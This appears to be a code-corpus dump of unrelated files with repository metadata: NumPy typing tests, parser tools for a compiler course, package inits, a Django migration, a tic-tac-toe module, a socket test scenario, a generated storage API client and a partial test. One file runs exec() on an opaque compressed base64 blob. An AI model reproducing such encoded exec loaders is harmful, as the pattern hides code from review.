np.char.strip(AR_U, chars=b"a") # E: incompatible type
np.char.strip(AR_S, chars="a") # E: incompatible type
np.char.rstrip(AR_U, chars=b"a") # E: incompatible type
np.char.rstrip(AR_S, chars="a") # E: incompatible type
np.char.partition(AR_U, b"a") # E: incompatible type
np.char.partition(AR_S, "a") # E: incompatible type
np.char.rpartition(AR_U, b"a") # E: incompatible type
np.char.rpartition(AR_S, "a") # E: incompatible type
np.char.replace(AR_U, b"_", b"-") # E: incompatible type
np.char.replace(AR_S, "_", "-") # E: incompatible type
np.char.split(AR_U, b"_") # E: incompatible type
np.char.split(AR_S, "_") # E: incompatible type
np.char.rsplit(AR_U, b"_") # E: incompatible type
np.char.rsplit(AR_S, "_") # E: incompatible type
np.char.count(AR_U, b"a", start=[1, 2, 3]) # E: incompatible type
np.char.count(AR_S, "a", end=9) # E: incompatible type
np.char.endswith(AR_U, b"a", start=[1, 2, 3]) # E: incompatible type
np.char.endswith(AR_S, "a", end=9) # E: incompatible type
np.char.startswith(AR_U, b"a", start=[1, 2, 3]) # E: incompatible type
np.char.startswith(AR_S, "a", end=9) # E: incompatible type
np.char.find(AR_U, b"a", start=[1, 2, 3]) # E: incompatible type
np.char.find(AR_S, "a", end=9) # E: incompatible type
np.char.rfind(AR_U, b"a", start=[1, 2, 3]) # E: incompatible type
np.char.rfind(AR_S, "a", end=9) # E: incompatible type
np.char.index(AR_U, b"a", start=[1, 2, 3]) # E: incompatible type
np.char.index(AR_S, "a", end=9) # E: incompatible type
np.char.rindex(AR_U, b"a", start=[1, 2, 3]) # E: incompatible type
np.char.rindex(AR_S, "a", end=9)  # E: incompatible type
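Every line in this file deliberately mixes a `np.str_` array with a `np.bytes_` array so the static type checker flags it. The runnable counterparts keep the string kinds matched, for example by decoding first (a small sketch, not part of the test file):

```python
import numpy as np

AR_U = np.array(["ab", "cd"], dtype=np.str_)
AR_S = np.array([b"ab", b"cd"], dtype=np.bytes_)

# Same-kind comparisons type-check and run; mixing str_ and bytes_ does not.
matches = np.char.equal(AR_U, np.char.decode(AR_S))
```

`np.char.decode` turns the bytes array into a str array, after which the `np.char` comparison functions accept both operands.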
5c7cdd5e2b3c5538b36921b0cbe218d534ee7326 | 948 | py | Python | src/cool/cmp/.ipynb_checkpoints/tools-checkpoint.py | Men-in-Code/cool-compiler-2021 | eb4dbb40f4d1e275176796cad2f1731d332ce7d2 | [
"MIT"
] | 1 | 2019-12-23T20:42:59.000Z | 2019-12-23T20:42:59.000Z | src/cool/cmp/.ipynb_checkpoints/tools-checkpoint.py | Men-in-Code/cool-compiler-2021 | eb4dbb40f4d1e275176796cad2f1731d332ce7d2 | [
"MIT"
] | null | null | null | src/cool/cmp/.ipynb_checkpoints/tools-checkpoint.py | Men-in-Code/cool-compiler-2021 | eb4dbb40f4d1e275176796cad2f1731d332ce7d2 | [
"MIT"
] | 1 | 2022-03-13T23:05:33.000Z | 2022-03-13T23:05:33.000Z |
import zlib, base64
exec(zlib.decompress(base64.b64decode('eJyVUk1r3DAQvftXiJy81BXJtaBDD+lSqFvThmVBGCOvx46ovhjJ2WZL/3sly5vNllwKAs08zeg9vdEAI+lnqYbOCfTSTF0QvYJyW40SffDVaJWyR7/5UJCa/f5TkNEiEUQasqUN2mE+BGmNj8dkzwT9AmOIYRPD73J6THFqgNSQb+RNm4pJwOdlJzXfV9BS4RyYoRSbBMKvA7jw+pxx0cZUjpdr6MGaIKTxHTgvlTVL/YUuK+f7zHchfJPxivKKEyHMaEhdDNErDcEOtnMIg4wvf7KdsR3CYY7mPdloW52cWirLYwrJjvEtvf/2qdpSHwSGH8+6tyq9RWt2G7cT4yk7PkoF5AFnWDRMbEeddeUiTrAj1zpVJQMm+tk/AGpphMp6E8iYWMXnbCFdEdIjiJ85BuXhDGv9jt0V/6AOpQnlzT2iRUo+9hZD/BeU0pts1NmQr9ZAcdV6cbhhNZ8q0fLbNgNpKjJNBYWZoFRgyib/kM37u2pZm7Oq3XkyawWX7cp8ejl5Y2b/qXvNTi8D1sVffqzjDA==')))
# Created by pyminifier (https://github.com/liftoff/pyminifier)
# The minified blob above defines `metodo_predictivo_no_recursivo` (Spanish for
# "non-recursive predictive method"); keep a handle to it before shadowing the name.
deprecated_metodo_predictivo_no_recursivo = metodo_predictivo_no_recursivo
def metodo_predictivo_no_recursivo(G, M):
    parser = deprecated_metodo_predictivo_no_recursivo(G, M)
    def updated(tokens):
        # Adapt the parser to accept Token objects rather than raw token types.
        return parser([t.token_type for t in tokens])
    return updated
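The rename-and-wrap pattern used here (alias the original under a `deprecated_` name, then rebind the name to an adapter) can be sketched with a toy stand-in for the parser factory; all names below are hypothetical:

```python
from collections import namedtuple

Token = namedtuple("Token", ["lex", "token_type"])

def build_parser(grammar, table):
    # Toy stand-in for the original factory: the "parser" just echoes its input.
    def parser(token_types):
        return list(token_types)
    return parser

deprecated_build_parser = build_parser
def build_parser(grammar, table):          # same name, rebound to an adapter
    parser = deprecated_build_parser(grammar, table)
    def updated(tokens):
        # Accept Token objects and forward only their token_type, as above.
        return parser([t.token_type for t in tokens])
    return updated

parse = build_parser(None, None)
print(parse([Token("x", "ID"), Token("+", "PLUS")]))  # -> ['ID', 'PLUS']
```

The adapter keeps callers working when they start passing richer token objects instead of bare token-type strings.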
7a37574a6485db21b14a941e7975c15475406164 | 232 | py | Python | bip_utils/bip/bip44_base/__init__.py | MIPPLTeam/bip_utils | c66446e7ac3879d2cf6308c5b8eb7f7705292660 | [
"MIT"
] | 149 | 2020-05-15T08:11:43.000Z | 2022-03-29T16:34:42.000Z | bip_utils/bip/bip44_base/__init__.py | MIPPLTeam/bip_utils | c66446e7ac3879d2cf6308c5b8eb7f7705292660 | [
"MIT"
] | 41 | 2020-04-03T15:57:56.000Z | 2022-03-31T08:25:11.000Z | bip_utils/bip/bip44_base/__init__.py | MIPPLTeam/bip_utils | c66446e7ac3879d2cf6308c5b8eb7f7705292660 | [
"MIT"
] | 55 | 2020-04-03T17:05:15.000Z | 2022-03-24T12:43:42.000Z |
from bip_utils.bip.bip44_base.bip44_base_ex import Bip44DepthError
from bip_utils.bip.bip44_base.bip44_base import Bip44Changes, Bip44Levels, Bip44Base
from bip_utils.bip.bip44_base.bip44_keys import Bip44PublicKey, Bip44PrivateKey
7a4f0470eebf524ece55691154aa684ccd3a105b | 2,016 | py | Python | source.py | yashcubex/pymyjoke | 1ed8f1e7f5b4d63bdc7eb03e28c661da11653497 | [
"MIT"
] | null | null | null | source.py | yashcubex/pymyjoke | 1ed8f1e7f5b4d63bdc7eb03e28c661da11653497 | [
"MIT"
] | null | null | null | source.py | yashcubex/pymyjoke | 1ed8f1e7f5b4d63bdc7eb03e28c661da11653497 | [
"MIT"
] | null | null | null |
import random
#Whole joke library
joke_lib = ["My wife told me to stop impersonating a flamingo. I had to put my foot down. ", "I went to buy some camo pants but couldn’t find any.", "I failed math so many times at school, I can’t even count.", "I used to have a handle on life, but then it broke.", "I was wondering why the frisbee kept getting bigger and bigger, but then it hit me.", "I heard there were a bunch of break-ins over at the car park. That is wrong on so many levels.", "I want to die peacefully in my sleep, like my grandfather… Not screaming and yelling like the passengers in his car.", "When life gives you melons, you might be dyslexic.", "Don’t you hate it when someone answers their own questions? I do.", "It takes a lot of balls to golf the way I do.", "I told him to be himself; that was pretty mean, I guess. ", "I know they say that money talks, but all mine says is ‘Goodbye.’", "My father has schizophrenia, but he’s good people.", "The problem with kleptomaniacs is that they always take things literally.", "I can’t believe I got fired from the calendar factory. All I did was take a day off.", "Most people are shocked when they find out how bad I am as an electrician.", "Never trust atoms; they make up everything.", "My wife just found out I replaced our bed with a trampoline. She hit the ceiling! ", "I was addicted to the hokey pokey, but then I turned myself around.", "I used to think I was indecisive. But now I’m not so sure.", "Light travels faster than sound, which is the reason that some people appear bright before you hear them speak. ", "Two fish are in a tank. One says, ‘How do you drive this thing?’", "I always take life with a grain of salt. And a slice of lemon. And a shot of tequila.", "Just burned 2,000 calories. That’s the last time I leave brownies in the oven while I nap.", "Always borrow money from a pessimist. They’ll never expect it back."]
# main code
class pymyjoke():
    @staticmethod
    def joke():
        return random.choice(joke_lib)

print(pymyjoke.joke())
7a61f809ea120b0a5a5861c2bad210b992e974bb | 123 | py | Python | pypif/obj/system/chemical/alloy/__init__.py | ventura-rivera/pypif | 42b40b0a4f80ccf909c9ff8dcc337f726b21be60 | [
"Apache-2.0"
] | 9 | 2016-09-07T19:36:47.000Z | 2022-01-03T13:17:25.000Z | pypif/obj/system/chemical/alloy/__init__.py | ventura-rivera/pypif | 42b40b0a4f80ccf909c9ff8dcc337f726b21be60 | [
"Apache-2.0"
] | 20 | 2016-08-22T20:24:28.000Z | 2017-11-28T22:18:47.000Z | pypif/obj/system/chemical/alloy/__init__.py | ventura-rivera/pypif | 42b40b0a4f80ccf909c9ff8dcc337f726b21be60 | [
"Apache-2.0"
] | 13 | 2016-01-08T21:09:48.000Z | 2020-04-30T22:13:28.000Z |
from pypif.obj.system.chemical.alloy.alloy import Alloy
from pypif.obj.system.chemical.alloy.alloy_phase import AlloyPhase
7a6884eb6282a4af6a4c727184ad962f4fc151cd | 4,669 | py | Python | safe_transaction_service/history/migrations/0048_block_number_token_transfers_20211126_1443.py | byteflyfunny/safe-transaction-service | 2a1a855d9881181a57692057aeb91c9fd8ae3de5 | [
"MIT"
] | 5 | 2018-07-02T17:18:18.000Z | 2018-09-10T20:58:34.000Z | safe_transaction_service/history/migrations/0048_block_number_token_transfers_20211126_1443.py | byteflyfunny/safe-transaction-service | 2a1a855d9881181a57692057aeb91c9fd8ae3de5 | [
"MIT"
] | 5 | 2018-08-08T11:05:56.000Z | 2018-10-03T08:51:37.000Z | safe_transaction_service/history/migrations/0048_block_number_token_transfers_20211126_1443.py | byteflyfunny/safe-transaction-service | 2a1a855d9881181a57692057aeb91c9fd8ae3de5 | [
"MIT"
] | 1 | 2022-02-07T09:04:23.000Z | 2022-02-07T09:04:23.000Z |
# Generated by Django 3.2.8 on 2021-11-26 15:57
import django.utils.timezone
from django.db import migrations, models
import gnosis.eth.django.models
class Migration(migrations.Migration):
dependencies = [
("history", "0047_auto_20211102_1659"),
]
operations = [
migrations.AddField(
model_name="erc20transfer",
name="block_number",
field=models.PositiveIntegerField(default=0),
preserve_default=False,
),
migrations.AddField(
model_name="erc20transfer",
name="timestamp",
field=models.DateTimeField(
db_index=True, default=django.utils.timezone.now
),
preserve_default=False,
),
migrations.AddField(
model_name="erc721transfer",
name="block_number",
field=models.PositiveIntegerField(default=0),
preserve_default=False,
),
migrations.AddField(
model_name="erc721transfer",
name="timestamp",
field=models.DateTimeField(
db_index=True, default=django.utils.timezone.now
),
preserve_default=False,
),
migrations.AlterField(
model_name="erc20transfer",
name="_from",
field=gnosis.eth.django.models.EthereumAddressField(),
),
migrations.AlterField(
model_name="erc20transfer",
name="to",
field=gnosis.eth.django.models.EthereumAddressField(),
),
migrations.AlterField(
model_name="erc721transfer",
name="_from",
field=gnosis.eth.django.models.EthereumAddressField(),
),
migrations.AlterField(
model_name="erc721transfer",
name="to",
field=gnosis.eth.django.models.EthereumAddressField(),
),
migrations.AddIndex(
model_name="erc20transfer",
index=models.Index(
fields=["_from", "timestamp"], name="history_erc__from_64986c_idx"
),
),
migrations.AddIndex(
model_name="erc20transfer",
index=models.Index(
fields=["to", "timestamp"], name="history_erc_to_f32154_idx"
),
),
migrations.AddIndex(
model_name="erc721transfer",
index=models.Index(
fields=["_from", "timestamp"], name="history_erc__from_72fb41_idx"
),
),
migrations.AddIndex(
model_name="erc721transfer",
index=models.Index(
fields=["to", "timestamp"], name="history_erc_to_02d4ab_idx"
),
),
migrations.AlterField(
model_name="erc20transfer",
name="address",
field=gnosis.eth.django.models.EthereumAddressField(),
),
migrations.AlterField(
model_name="erc721transfer",
name="address",
field=gnosis.eth.django.models.EthereumAddressField(),
),
migrations.AddIndex(
model_name="erc20transfer",
index=models.Index(
fields=["address"], name="history_erc_address_dba64d_idx"
),
),
migrations.AddIndex(
model_name="erc721transfer",
index=models.Index(
fields=["address"], name="history_erc_address_94cee3_idx"
),
),
migrations.RunSQL(
"""
UPDATE "history_erc20transfer" SET (block_number, timestamp) =
(
SELECT "history_ethereumblock"."number", "history_ethereumblock"."timestamp"
FROM "history_ethereumtx" INNER JOIN "history_ethereumblock" ON (
"history_ethereumtx"."block_id" = "history_ethereumblock"."number"
) WHERE "history_erc20transfer"."ethereum_tx_id" = "history_ethereumtx"."tx_hash");
""",
reverse_sql=migrations.RunSQL.noop,
),
migrations.RunSQL(
"""
UPDATE "history_erc721transfer" SET (block_number, timestamp) =
(
SELECT "history_ethereumblock"."number", "history_ethereumblock"."timestamp"
FROM "history_ethereumtx" INNER JOIN "history_ethereumblock" ON (
"history_ethereumtx"."block_id" = "history_ethereumblock"."number"
) WHERE "history_erc721transfer"."ethereum_tx_id" = "history_ethereumtx"."tx_hash");
""",
reverse_sql=migrations.RunSQL.noop,
),
]
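The two RunSQL backfills above rely on PostgreSQL's multi-column `UPDATE ... SET (a, b) = (subquery)` form. As a rough sketch of the same join logic against an in-memory SQLite database (table and column names here are simplified stand-ins for the migration's tables, and SQLite needs one correlated subquery per column):

```python
import sqlite3

# Hypothetical mirror of the migration's backfill: copy block number and
# timestamp from the joined tx/block tables onto each transfer row.
conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE block (number INTEGER PRIMARY KEY, timestamp TEXT);
    CREATE TABLE tx (tx_hash TEXT PRIMARY KEY, block_id INTEGER);
    CREATE TABLE transfer (id INTEGER PRIMARY KEY, ethereum_tx_id TEXT,
                           block_number INTEGER DEFAULT 0, timestamp TEXT);
    INSERT INTO block VALUES (100, '2021-11-02T16:59:00');
    INSERT INTO tx VALUES ('0xabc', 100);
    INSERT INTO transfer (id, ethereum_tx_id) VALUES (1, '0xabc');
""")
# SQLite has no SET (a, b) = (subquery), so each column repeats the join.
conn.execute("""
    UPDATE transfer SET
        block_number = (SELECT b.number FROM tx t
                        JOIN block b ON t.block_id = b.number
                        WHERE transfer.ethereum_tx_id = t.tx_hash),
        timestamp    = (SELECT b.timestamp FROM tx t
                        JOIN block b ON t.block_id = b.number
                        WHERE transfer.ethereum_tx_id = t.tx_hash)
""")
row = conn.execute(
    "SELECT block_number, timestamp FROM transfer WHERE id = 1").fetchone()
```

With the sample row above, `row` comes back as `(100, '2021-11-02T16:59:00')`, matching what the migration writes for each transfer.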
# File: preimutils/segmentations/__init__.py (ArianAmani/preimutils, MIT)
from . import voc
from . import coco
# File: neural_net/old_cell_nodes_leftovers.py (Ipgnosis/tic_tac_toe, BSD-3-Clause)
"""
# test calls
zero = board_cell(0, 'zero')
print(zero.position)
print(zero.node_name)
zero.move = 'X'
print(zero.p_x_wins())
print(zero.p_o_wins())
print(zero.p_draw())
print(zero.cell_contains())
"""
# returns:
# 0 * weight for empty
# 1 * weight for 'X' (cross)
# -1 * weight for 'O' (nought)
# Module-level names expected by the cell node functions below.
cell_weights = [1, 1, 1, 1, 1, 1, 1, 1, 1]
print_cell_results = False
# cell node for cell zero
def zero(this_board):
this_cell = 0
index = 0 # starting default value
node_name = "zero"
cell_weight = cell_weights[this_cell]
if this_cell in this_board:
index = this_board.index(this_cell)
if index % 2 == 0 or index == 0:
if print_cell_results:
# cell contains "X"
print("Cell", node_name, ":", 1 * cell_weight)
return 1 * cell_weight
else:
# cell contains "O"
if print_cell_results:
print("Cell", node_name, ":", -1 * cell_weight)
return -1 * cell_weight
else:
# cell is empty
if print_cell_results:
print("Cell", node_name, ":", 0 * cell_weight)
return 0 * cell_weight
# cell node for cell 1
def one(this_board):
this_cell = 1
node_name = "one"
cell_weight = cell_weights[this_cell]
if this_cell in this_board:
index = this_board.index(this_cell)
if index % 2 == 0 or index == 0:
if print_cell_results:
# cell contains "X"
print("Cell", node_name, ":", 1 * cell_weight)
return 1 * cell_weight
else:
# cell contains "O"
if print_cell_results:
print("Cell", node_name, ":", -1 * cell_weight)
return -1 * cell_weight
else:
# cell is empty
if print_cell_results:
print("Cell", node_name, ":", 0 * cell_weight)
return 0 * cell_weight
# cell node for cell 2
def two(this_board):
this_cell = 2
node_name = "two"
cell_weight = cell_weights[this_cell]
if this_cell in this_board:
index = this_board.index(this_cell)
if index % 2 == 0 or index == 0:
if print_cell_results:
# cell contains "X"
print("Cell", node_name, ":", 1 * cell_weight)
return 1 * cell_weight
else:
# cell contains "O"
if print_cell_results:
print("Cell", node_name, ":", -1 * cell_weight)
return -1 * cell_weight
else:
# cell is empty
if print_cell_results:
print("Cell", node_name, ":", 0 * cell_weight)
return 0 * cell_weight
# cell node for cell 3
def three(this_board):
this_cell = 3
node_name = "three"
cell_weight = cell_weights[this_cell]
if this_cell in this_board:
index = this_board.index(this_cell)
if index % 2 == 0 or index == 0:
if print_cell_results:
# cell contains "X"
print("Cell", node_name, ":", 1 * cell_weight)
return 1 * cell_weight
else:
# cell contains "O"
if print_cell_results:
print("Cell", node_name, ":", -1 * cell_weight)
return -1 * cell_weight
else:
# cell is empty
if print_cell_results:
print("Cell", node_name, ":", 0 * cell_weight)
return 0 * cell_weight
# cell node for cell 4
def four(this_board):
this_cell = 4
node_name = "four"
cell_weight = cell_weights[this_cell]
if this_cell in this_board:
index = this_board.index(this_cell)
if index % 2 == 0 or index == 0:
if print_cell_results:
# cell contains "X"
print("Cell", node_name, ":", 1 * cell_weight)
return 1 * cell_weight
else:
# cell contains "O"
if print_cell_results:
print("Cell", node_name, ":", -1 * cell_weight)
return -1 * cell_weight
else:
# cell is empty
if print_cell_results:
print("Cell", node_name, ":", 0 * cell_weight)
return 0 * cell_weight
# cell node for cell 5
def five(this_board):
this_cell = 5
node_name = "five"
cell_weight = cell_weights[this_cell]
if this_cell in this_board:
index = this_board.index(this_cell)
if index % 2 == 0 or index == 0:
if print_cell_results:
# cell contains "X"
print("Cell", node_name, ":", 1 * cell_weight)
return 1 * cell_weight
else:
# cell contains "O"
if print_cell_results:
print("Cell", node_name, ":", -1 * cell_weight)
return -1 * cell_weight
else:
# cell is empty
if print_cell_results:
print("Cell", node_name, ":", 0 * cell_weight)
return 0 * cell_weight
# cell node for cell 6
def six(this_board):
this_cell = 6
node_name = "six"
cell_weight = cell_weights[this_cell]
if this_cell in this_board:
index = this_board.index(this_cell)
if index % 2 == 0 or index == 0:
if print_cell_results:
# cell contains "X"
print("Cell", node_name, ":", 1 * cell_weight)
return 1 * cell_weight
else:
# cell contains "O"
if print_cell_results:
print("Cell", node_name, ":", -1 * cell_weight)
return -1 * cell_weight
else:
# cell is empty
if print_cell_results:
print("Cell", node_name, ":", 0 * cell_weight)
return 0 * cell_weight
# cell node for cell 7
def seven(this_board):
this_cell = 7
node_name = "seven"
cell_weight = cell_weights[this_cell]
if this_cell in this_board:
index = this_board.index(this_cell)
if index % 2 == 0 or index == 0:
if print_cell_results:
# cell contains "X"
print("Cell", node_name, ":", 1 * cell_weight)
return 1 * cell_weight
else:
# cell contains "O"
if print_cell_results:
print("Cell", node_name, ":", -1 * cell_weight)
return -1 * cell_weight
else:
# cell is empty
if print_cell_results:
print("Cell", node_name, ":", 0 * cell_weight)
return 0 * cell_weight
# cell node for cell 8
def eight(this_board):
this_cell = 8
node_name = "eight"
cell_weight = cell_weights[this_cell]
if this_cell in this_board:
index = this_board.index(this_cell)
if index % 2 == 0 or index == 0:
if print_cell_results:
# cell contains "X"
print("Cell", node_name, ":", 1 * cell_weight)
return 1 * cell_weight
else:
# cell contains "O"
if print_cell_results:
print("Cell", node_name, ":", -1 * cell_weight)
return -1 * cell_weight
else:
# cell is empty
if print_cell_results:
print("Cell", node_name, ":", 0 * cell_weight)
return 0 * cell_weight
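The nine functions above differ only in `this_cell` and `node_name`. A possible consolidation is a single factory that builds each cell node; this is a sketch, assuming the same weighting convention (1 for 'X', -1 for 'O', 0 for empty) and taking the weights as an explicit argument instead of a module-level global:

```python
def make_cell_node(this_cell, node_name, cell_weights, print_cell_results=False):
    """Build a cell node function for board position `this_cell`."""
    def node(this_board):
        cell_weight = cell_weights[this_cell]
        if this_cell in this_board:
            index = this_board.index(this_cell)
            value = 1 if index % 2 == 0 else -1  # even move index: 'X', odd: 'O'
        else:
            value = 0  # cell is empty
        if print_cell_results:
            print("Cell", node_name, ":", value * cell_weight)
        return value * cell_weight
    return node

cell_weights = [1] * 9
zero = make_cell_node(0, "zero", cell_weights)
# zero([0, 4, 8]) -> 1 (cell 0 played at an even move index, so it holds 'X')
```

The redundant `or index == 0` test from the originals is dropped, since `index == 0` already satisfies `index % 2 == 0`.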
# File: scenarios/without_auth.py (ashirko/egts-debugger-tester, MIT)
import scenario
sock = scenario.start_scenario()
nav_packet = b"\x01\x00\x00\x0b\x00\x23\x00\x00\x00\x01\x99\x18\x00\x00\x00\x01\xef\x00\x00\x00\x02\x02\x10" \
b"\x15\x00\xd2\x31\x2b\x10\x4f\xba\x3a\x9e\xd2\x27\xbc\x35\x03\x00\x00\xb2\x00\x00\x00\x00\x00" \
b"\x6a\x8d"
sock.send(nav_packet)
_ = sock.recv(1024)
sock.close()
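The send/receive pattern used by the scenario can be exercised without the real EGTS debugger; below is a self-contained sketch against a local echo server (the echo server, the port choice, and the shortened payload are stand-ins, not part of the project):

```python
import socket
import threading

NAV_PACKET = b"\x01\x00\x00\x0b\x00\x23\x00"  # shortened stand-in payload

def echo_server(listener):
    # Accept one connection and echo the packet back; a real EGTS
    # dispatcher would instead answer with a response record.
    conn, _ = listener.accept()
    data = conn.recv(1024)
    conn.sendall(data)
    conn.close()

listener = socket.socket()
listener.bind(("127.0.0.1", 0))  # port 0: let the OS pick a free port
listener.listen(1)
threading.Thread(target=echo_server, args=(listener,), daemon=True).start()

sock = socket.create_connection(listener.getsockname(), timeout=5)
sock.settimeout(5)  # avoid blocking forever on a silent peer
sock.send(NAV_PACKET)
reply = sock.recv(1024)
sock.close()
listener.close()
```

A timeout on `recv` is worth adding to the real scenario too: without it, a debugger that drops the packet silently would hang the test run.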
# coding: utf-8
# File: pypureclient/flasharray/FA_2_10/api/virtual_machines_api.py (Flav-STOR-WL/py-pure-client, BSD-2-Clause)
"""
FlashArray REST API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 2.10
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re
# python 2 and python 3 compatibility library
import six
from typing import List, Optional
from .. import models
class VirtualMachinesApi(object):
def __init__(self, api_client):
self.api_client = api_client
def api210_virtual_machines_patch_with_http_info(
self,
virtual_machine=None, # type: models.VirtualMachinePost
authorization=None, # type: str
x_request_id=None, # type: str
async_req=False, # type: bool
_return_http_data_only=False, # type: bool
_preload_content=True, # type: bool
_request_timeout=None, # type: Optional[int]
):
# type: (...) -> models.VirtualMachineResponse
"""Modify a virtual machine
Modifies a virtual machine, recovering it from the destroyed state. If recovering the virtual machine causes a conflict with an existing virtual machine, the operation fails.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api210_virtual_machines_patch_with_http_info(virtual_machine, async_req=True)
>>> result = thread.get()
:param VirtualMachinePost virtual_machine: (required)
:param str authorization: Access token (in JWT format) required to use any API endpoint (except `/oauth2`, `/login`, and `/logout`)
:param str x_request_id: Supplied by client during request or generated by server.
:param bool async_req: Request runs in separate thread and method returns multiprocessing.pool.ApplyResult.
:param bool _return_http_data_only: Returns only data field.
:param bool _preload_content: Response is converted into objects.
:param int _request_timeout: Total request timeout in seconds.
It can also be a tuple of (connection time, read time) timeouts.
:return: VirtualMachineResponse
If the method is called asynchronously,
returns the request thread.
"""
params = {k: v for k, v in six.iteritems(locals()) if v is not None}
# Convert the filter into a string
if params.get('filter'):
params['filter'] = str(params['filter'])
if params.get('sort'):
params['sort'] = [str(_x) for _x in params['sort']]
# verify the required parameter 'virtual_machine' is set
if virtual_machine is None:
raise TypeError("Missing the required parameter `virtual_machine` when calling `api210_virtual_machines_patch`")
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'authorization' in params:
header_params['Authorization'] = params['authorization']
if 'x_request_id' in params:
header_params['X-Request-ID'] = params['x_request_id']
form_params = []
local_var_files = {}
body_params = None
if 'virtual_machine' in params:
body_params = params['virtual_machine']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(
'/api/2.10/virtual-machines', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='VirtualMachineResponse',
auth_settings=auth_settings,
async_req=async_req,
_return_http_data_only=_return_http_data_only,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
collection_formats=collection_formats,
)
def api210_virtual_machines_post_with_http_info(
self,
virtual_machine=None, # type: models.VirtualMachinePost
authorization=None, # type: str
x_request_id=None, # type: str
overwrite=None, # type: bool
async_req=False, # type: bool
_return_http_data_only=False, # type: bool
_preload_content=True, # type: bool
_request_timeout=None, # type: Optional[int]
):
# type: (...) -> models.VirtualMachineResponse
"""Create a virtual machine
Creates one or more virtual machines from a protection group snapshot. If `overwrite` is specified, an existing virtual machine has its volumes overwritten by the snapshot. Otherwise, a new virtual machine is created from the snapshot. If creating the new virtual machine causes a conflict with an existing virtual machine, the operation fails.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api210_virtual_machines_post_with_http_info(virtual_machine, async_req=True)
>>> result = thread.get()
:param VirtualMachinePost virtual_machine: (required)
:param str authorization: Access token (in JWT format) required to use any API endpoint (except `/oauth2`, `/login`, and `/logout`)
:param str x_request_id: Supplied by client during request or generated by server.
:param bool overwrite: If set to `true`, overwrites an existing volume during a volume copy operation. If set to `false` or not set at all and the target name is an existing volume, the volume copy operation fails. Required if the `source: id` or `source: name` body parameter is set and the source overwrites an existing volume during the volume copy operation.
:param bool async_req: Request runs in separate thread and method returns multiprocessing.pool.ApplyResult.
:param bool _return_http_data_only: Returns only data field.
:param bool _preload_content: Response is converted into objects.
:param int _request_timeout: Total request timeout in seconds.
It can also be a tuple of (connection time, read time) timeouts.
:return: VirtualMachineResponse
If the method is called asynchronously,
returns the request thread.
"""
params = {k: v for k, v in six.iteritems(locals()) if v is not None}
# Convert the filter into a string
if params.get('filter'):
params['filter'] = str(params['filter'])
if params.get('sort'):
params['sort'] = [str(_x) for _x in params['sort']]
# verify the required parameter 'virtual_machine' is set
if virtual_machine is None:
raise TypeError("Missing the required parameter `virtual_machine` when calling `api210_virtual_machines_post`")
collection_formats = {}
path_params = {}
query_params = []
if 'overwrite' in params:
query_params.append(('overwrite', params['overwrite']))
header_params = {}
if 'authorization' in params:
header_params['Authorization'] = params['authorization']
if 'x_request_id' in params:
header_params['X-Request-ID'] = params['x_request_id']
form_params = []
local_var_files = {}
body_params = None
if 'virtual_machine' in params:
body_params = params['virtual_machine']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(
'/api/2.10/virtual-machines', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='VirtualMachineResponse',
auth_settings=auth_settings,
async_req=async_req,
_return_http_data_only=_return_http_data_only,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
collection_formats=collection_formats,
)
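Both methods start with the same idiom for collecting only the parameters the caller actually set: a dict comprehension over `locals()`, which works because the outermost iterable of a comprehension is evaluated in the enclosing function scope. A standalone illustration of that idiom and the header/query dispatch it feeds (`build_query` is a hypothetical helper, not part of the generated client):

```python
def build_query(virtual_machine=None, authorization=None,
                x_request_id=None, overwrite=None):
    # locals() here holds exactly the keyword arguments; dropping the
    # None values leaves only what the caller explicitly passed.
    params = {k: v for k, v in locals().items() if v is not None}

    query_params = []
    if 'overwrite' in params:
        query_params.append(('overwrite', params['overwrite']))

    header_params = {}
    if 'authorization' in params:
        header_params['Authorization'] = params['authorization']
    if 'x_request_id' in params:
        header_params['X-Request-ID'] = params['x_request_id']

    return params, query_params, header_params

params, query, headers = build_query(virtual_machine={'name': 'vm1'},
                                     overwrite=True)
```

Unset arguments never reach the request: `params` contains only `virtual_machine` and `overwrite`, `query` carries the overwrite flag, and `headers` stays empty.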
#!/usr/bin/env python
# File: tests/test_matrix_rotation.py (VaibhavHiwase/matrix_rotation, MIT)
# -*- coding: utf-8 -*-
"""
test_matrix_rotation
----------------------------------
Tests for `matrix_rotation` module.
"""
import unittest
from click.testing import CliRunner
from matrix_rotation import rotate_matrix, matrix_rotation_cli
__all__ = ['Test_matrix_rotation']
class Test_matrix_rotation(unittest.TestCase):
def array_shape(self, matrix):
matrix_length = len(matrix)
for list_num, each_list in enumerate(matrix):
assert matrix_length == len(each_list)
else:
return (matrix_length, len(each_list))
def setUp(self):
self.matrix = [['1', '2', '3', '4', '5', '6', '7'],
['24', '25', '26', '27', '28', '29', '8'],
['23', '40', '41', '42', '43', '30', '9'],
['22', '39', '48', '49', '44', '31', '10'],
['21', '38', '47', '46', '45', '32', '11'],
['20', '37', '36', '35', '34', '33', '12'],
['19', '18', '17', '16', '15', '14', '13']]
self.degrees = [15, 30, 45, 60, 90]
self.clockwise_any_degree_result_dictionary = {
15: [['10', '11', '12', '13', '14', '15', '16'],
['9', '26', '27', '28', '29', '30', '17'],
['8', '25', '41', '42', '43', '31', '18'],
['7', '40', '48', '49', '44', '32', '19'],
['6', '39', '47', '46', '45', '33', '20'],
['5', '38', '37', '36', '35', '34', '21'],
['4', '3', '2', '1', '24', '23', '22']],
